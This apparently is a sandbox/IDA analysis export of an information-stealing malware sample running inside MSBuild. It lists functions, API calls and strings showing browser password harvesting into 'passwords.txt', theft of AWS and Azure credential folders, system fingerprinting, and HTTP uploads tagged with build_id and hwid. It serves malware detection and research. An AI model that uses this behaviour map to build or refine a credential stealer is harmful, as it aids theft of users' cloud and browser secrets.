Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 2c44779aabef87b9581270847a68ffa4337e3578c553800efa12b6905948f0f3
Instruction ID: b7ea1294fc7bb67f071b81b027119134029a8d5aa356f85c21b5f13a268287ef
Opcode Fuzzy Hash: 2c44779aabef87b9581270847a68ffa4337e3578c553800efa12b6905948f0f3
Instruction Fuzzy Hash: BF711A75911322AFDF1ADFA0FD4A8243AABFB08203F11B526E91982274D7774B60DF15

Function 004169F8 Relevance: 45.8, APIs: 10, Strings: 16, Instructions: 331
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041051E: lstrlenA.KERNEL32(?,?,00417300,004366BE,004366BB,?,?,?,?,0041871B), ref: 00410524
Part of subcall function 0041051E: lstrcpyA.KERNEL32(00000000,00000000,?,00417300,004366BE,004366BB,?,?,?,?,0041871B), ref: 00410556

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 00416908: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041695C
Part of subcall function 00416908: lstrlenA.KERNEL32(?), ref: 00416967
Part of subcall function 00416908: StrStrA.SHLWAPI(00000000,?), ref: 0041697C
Part of subcall function 00416908: lstrlenA.KERNEL32(?), ref: 0041698B
Part of subcall function 00416908: lstrlenA.KERNEL32(00000000), ref: 004169A4

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AE2
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B3B
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B9B
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF4
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416C54
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416CAD
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416CC3

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00416880: StrCmpCA.SHLWAPI(?,ERROR), ref: 004168B5

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416D23
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416D7C
Sleep.KERNEL32(0000EA60), ref: 00416D8B

Strings

ERROR, xrefs: 00416ADA
ERROR, xrefs: 00416C4C
ERROR, xrefs: 00416CBB
sqlp.dll, xrefs: 00416E28
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416E09
sqlp.dll, xrefs: 00416E59
ERROR, xrefs: 00416D74
sql.dll, xrefs: 00416E8A
sqlp.dll, xrefs: 00416DC0
ERROR, xrefs: 00416CA5
ERROR, xrefs: 00416B93
ERROR, xrefs: 00416B33
ERROR, xrefs: 00416D1B
ERROR, xrefs: 00416BEC
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416E3A
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416DA1

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sql.dll$sqlp.dll$sqlp.dll$sqlp.dll
API String ID: 507064821-4224206380
Opcode ID: bb8b5c372840cb7a8fa14a528d1cd8c2fb6c926bf6f8705950d9a8f153c64bfd
Instruction ID: c96905e032ea58ce99b70598aea186164cafeb2dddef774f4f0125fc679c1448
Opcode Fuzzy Hash: bb8b5c372840cb7a8fa14a528d1cd8c2fb6c926bf6f8705950d9a8f153c64bfd
Instruction Fuzzy Hash: 2FC15C71E40218ABCF10FB65DD47ACC7735AF04748F51806AF905B7192DB78AE8A8B8D

Function 00408853 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 389
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041076A: StrCmpCA.SHLWAPI(?,?,?,0040886E,?,?,?), ref: 00410773

CopyFileA.KERNEL32(?,?,00000001), ref: 0040894C

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00412285: _memset.LIBCMT ref: 004122AC
Part of subcall function 00412285: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00412352
Part of subcall function 00412285: TerminateProcess.KERNEL32(00000000,00000000), ref: 00412360
Part of subcall function 00412285: CloseHandle.KERNEL32(00000000), ref: 00412367

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AB1
RtlAllocateHeap.NTDLL(00000000), ref: 00408AB8
StrCmpCA.SHLWAPI(?,ERROR_V128), ref: 00408BA2
StrCmpCA.SHLWAPI(?,004371E0), ref: 00408BBB
StrCmpCA.SHLWAPI(?,004371E4), ref: 00408BE3
lstrlenA.KERNEL32(?), ref: 00408D03
lstrlenA.KERNEL32(?), ref: 00408D1E

Part of subcall function 00417023: CreateThread.KERNEL32(00000000,00000000,00416F52,?,00000000,00000000), ref: 004170C2
Part of subcall function 00417023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 004170CA

DeleteFileA.KERNEL32(?), ref: 00408D61

Strings

ERROR_V128, xrefs: 00408B9A

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
String ID: ERROR_V128
API String ID: 2819533921-2537946777
Opcode ID: d425d5c11306358bd346e746c911d84a512bf20431e999cad96ff7e989aefb2b
Instruction ID: 3a606cbdd3e2521ff2ee130744cd68fffe80a480428377c0373a89dce18687d0
Opcode Fuzzy Hash: d425d5c11306358bd346e746c911d84a512bf20431e999cad96ff7e989aefb2b
Instruction Fuzzy Hash: 83E12E72D00209ABCF11FFA1ED469DD7B76AF04305F20502AF551B31A2DBB96E869F48

Function 00408533 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 231
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

CopyFileA.KERNEL32(?,?,00000001), ref: 004085D8
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040862D
RtlAllocateHeap.NTDLL(00000000), ref: 00408634
lstrlenA.KERNEL32(?), ref: 004086D2
lstrcatA.KERNEL32(?), ref: 004086EB
lstrcatA.KERNEL32(?,?), ref: 004086F5
lstrcatA.KERNEL32(?,0043719C), ref: 00408701
lstrcatA.KERNEL32(?,?), ref: 0040870B
lstrcatA.KERNEL32(?,004371A0), ref: 00408717
lstrcatA.KERNEL32(?), ref: 00408724
lstrcatA.KERNEL32(?,?), ref: 0040872E
lstrcatA.KERNEL32(?,004371A4), ref: 0040873A
lstrcatA.KERNEL32(?), ref: 00408747
lstrcatA.KERNEL32(?,?), ref: 00408751
lstrcatA.KERNEL32(?,004371A8), ref: 0040875D
lstrcatA.KERNEL32(?), ref: 0040876A
lstrcatA.KERNEL32(?,?), ref: 00408774
lstrcatA.KERNEL32(?,004371AC), ref: 00408780
lstrcatA.KERNEL32(?,004371B0), ref: 0040878C
lstrlenA.KERNEL32(?), ref: 004087C5
DeleteFileA.KERNEL32(?), ref: 00408812

Strings

passwords.txt, xrefs: 004087D5

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID: passwords.txt
API String ID: 1956182324-347816968
Opcode ID: 008e8c39cc3674f3724c224db5a7feafcffbc63239d7bfaab6de3a26047a72a8
Instruction ID: 536a68b7eef2ba26c00b18e9acfc7c680cb774552cc455c72716e410e890dfb9
Opcode Fuzzy Hash: 008e8c39cc3674f3724c224db5a7feafcffbc63239d7bfaab6de3a26047a72a8
Instruction Fuzzy Hash: C9813A32900208BBCF15FBA1ED4A9DD7B76AF08306F105026F601B31B1DBBA5E559B99

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00401696
wsprintfW.USER32 ref: 004016BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
RtlAllocateHeap.NTDLL(00000000), ref: 00401705
_time64.MSVCRT ref: 0040170E
srand.MSVCRT ref: 00401715
rand.MSVCRT ref: 0040171E
_memset.LIBCMT ref: 0040172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
_memset.LIBCMT ref: 00401763
CloseHandle.KERNEL32(?), ref: 00401771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
_memset.LIBCMT ref: 004017BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
RtlFreeHeap.NTDLL(00000000), ref: 004017CF
CloseHandle.KERNEL32(?), ref: 004017DB

Strings

delays.tmp, xrefs: 004016A4
%s%s, xrefs: 004016B6

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: 820f1e7ba494bd61ac6bf0e814630c16787a7429a39b3548041dc5c13d7d5828
Instruction ID: 61b7e4c89c3b78e1bbd4172251f200a6202653691bf2d5690fb9ae43eadc8d0c
Opcode Fuzzy Hash: 820f1e7ba494bd61ac6bf0e814630c16787a7429a39b3548041dc5c13d7d5828
Instruction Fuzzy Hash: CE41C8B1D00218ABD7205F61AC4CF9F7B7DEB89715F1012BAF009E11A1DA354A54CF28

Function 00404B2E Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 378networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
StrCmpCA.SHLWAPI(?), ref: 00404BEB
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

lstrlenA.KERNEL32(?,00436947,",build_id,004377BC,------,004377B0,",hwid,0043779C,------), ref: 004050EE
lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
InternetCloseHandle.WININET(00000000), ref: 00405177
InternetCloseHandle.WININET(?), ref: 0040518E
InternetCloseHandle.WININET(?), ref: 0040519A

Strings

------, xrefs: 00404C75
hwid, xrefs: 00404EAD
build_id, xrefs: 0040500D
------, xrefs: 00404DFB
------, xrefs: 00404F5B
", xrefs: 00405039
", xrefs: 00404ED9

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: "$"$------$------$------$build_id$hwid
API String ID: 3006978581-3960666492
Opcode ID: b26da64760340284cf0e1a389c980c0f2f0bbf0619c8fa29417fdc3f6536b416
Instruction ID: 82341b1e9ceb90a360bae6b2b4795e4db786059c8bf85b476d97687f296100b2
Opcode Fuzzy Hash: b26da64760340284cf0e1a389c980c0f2f0bbf0619c8fa29417fdc3f6536b416
Instruction Fuzzy Hash: BC028171D1512A9BCB20EB21CD46ADDB7B5FF04748F0190E6A54877152CAB87ECA8FC8

Function 004117DC Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004117E3
CoInitializeEx.OLE32(00000000,00000000,0000004C,00413F39,Install Date: ,004368B8,00000000,Windows: ,004368A8,Work Dir: In memory,00436890), ref: 004117F4
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411805
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041181F
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411855
VariantInit.OLEAUT32(?), ref: 004118B0

Part of subcall function 0041172C: __EH_prolog3_catch.LIBCMT ref: 00411733
Part of subcall function 0041172C: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043B00C,?,00000018,004118D6,?), ref: 00411756
Part of subcall function 0041172C: SysAllocString.OLEAUT32(?), ref: 00411763
Part of subcall function 0041172C: _wtoi64.MSVCRT ref: 00411796
Part of subcall function 0041172C: SysFreeString.OLEAUT32(?), ref: 004117AF
Part of subcall function 0041172C: SysFreeString.OLEAUT32(00000000), ref: 004117B6

FileTimeToSystemTime.KERNEL32(?,?), ref: 004118DF
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004118EB
HeapAlloc.KERNEL32(00000000), ref: 004118F2
VariantClear.OLEAUT32(?), ref: 00411931
wsprintfA.USER32 ref: 0041191E

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Strings

ROOT\CIMV2, xrefs: 00411837
WQL, xrefs: 0041186F
Unknown, xrefs: 0041193F
Unknown, xrefs: 0041195A
InstallDate, xrefs: 004118C2
Select * From Win32_OperatingSystem, xrefs: 0041186A
%d/%d/%d %d:%d:%d, xrefs: 00411918
Unknown, xrefs: 00411946

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: e4e81807fbf7fe9523cad8b10a19950e4bc3ba6a15c74dfeb46019d0c9263f6d
Instruction ID: db99f3ec71cbfa89bd8d8c5389e41edfa11349f05b1137792e0f294ef496a485
Opcode Fuzzy Hash: e4e81807fbf7fe9523cad8b10a19950e4bc3ba6a15c74dfeb46019d0c9263f6d
Instruction Fuzzy Hash: FB415171900205BBDB10DBD5DC89EEFBBBDEFC9B11F20411AF611A61A0D6789941CB38

Function 004164FF Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00416524

Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416543
lstrcatA.KERNEL32(?,\.azure\), ref: 00416560

Part of subcall function 00416013: wsprintfA.USER32 ref: 0041605A
Part of subcall function 00416013: FindFirstFileA.KERNEL32(?,?), ref: 00416071
Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436ABC), ref: 00416092
Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436AC0), ref: 004160AC
Part of subcall function 00416013: wsprintfA.USER32 ref: 004160D3
Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436647), ref: 004160E7
Part of subcall function 00416013: wsprintfA.USER32 ref: 00416104
Part of subcall function 00416013: PathMatchSpecA.SHLWAPI(?,?), ref: 00416131
Part of subcall function 00416013: lstrcatA.KERNEL32(?), ref: 00416167
Part of subcall function 00416013: lstrcatA.KERNEL32(?,00436AD8), ref: 00416179
Part of subcall function 00416013: lstrcatA.KERNEL32(?,?), ref: 0041618C
Part of subcall function 00416013: lstrcatA.KERNEL32(?,00436ADC), ref: 0041619E
Part of subcall function 00416013: lstrcatA.KERNEL32(?,?), ref: 004161B2

_memset.LIBCMT ref: 00416598
lstrcatA.KERNEL32(?,00000000), ref: 004165BA
lstrcatA.KERNEL32(?,\.aws\), ref: 004165D7

Part of subcall function 00416013: wsprintfA.USER32 ref: 0041611B
Part of subcall function 00416013: CopyFileA.KERNEL32(?,?,00000001), ref: 0041626B
Part of subcall function 00416013: DeleteFileA.KERNEL32(?), ref: 004162DF
Part of subcall function 00416013: FindNextFileA.KERNEL32(?,?), ref: 00416341
Part of subcall function 00416013: FindClose.KERNEL32(?), ref: 00416355

_memset.LIBCMT ref: 0041660C
lstrcatA.KERNEL32(?,00000000), ref: 0041662E
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 0041664B
_memset.LIBCMT ref: 00416680

Strings

\.IdentityService\, xrefs: 0041663F
msal.cache, xrefs: 00416660
\.azure\, xrefs: 00416554
\.aws\, xrefs: 004165CB
Azure\.azure, xrefs: 00416573
*.*, xrefs: 00416578
*.*, xrefs: 004165EC
Azure\.IdentityService, xrefs: 0041665B
Azure\.aws, xrefs: 004165E7

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 780282842-974132213
Opcode ID: 05a745780dc4331e7a01d26ef552109a27bfc1aac6297cc6218e18bbe709eec3
Instruction ID: 7e27a3cebc04104317c4296e2fa94507ccdbbf8e03ba376e9605ba8870e2e08e
Opcode Fuzzy Hash: 05a745780dc4331e7a01d26ef552109a27bfc1aac6297cc6218e18bbe709eec3
Instruction Fuzzy Hash: ED41B671D4021D7ADB24EB60EC47FDD7778AB08304F5444AAB605E70D1DAB8AB848F58

Function 0040ABBA Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
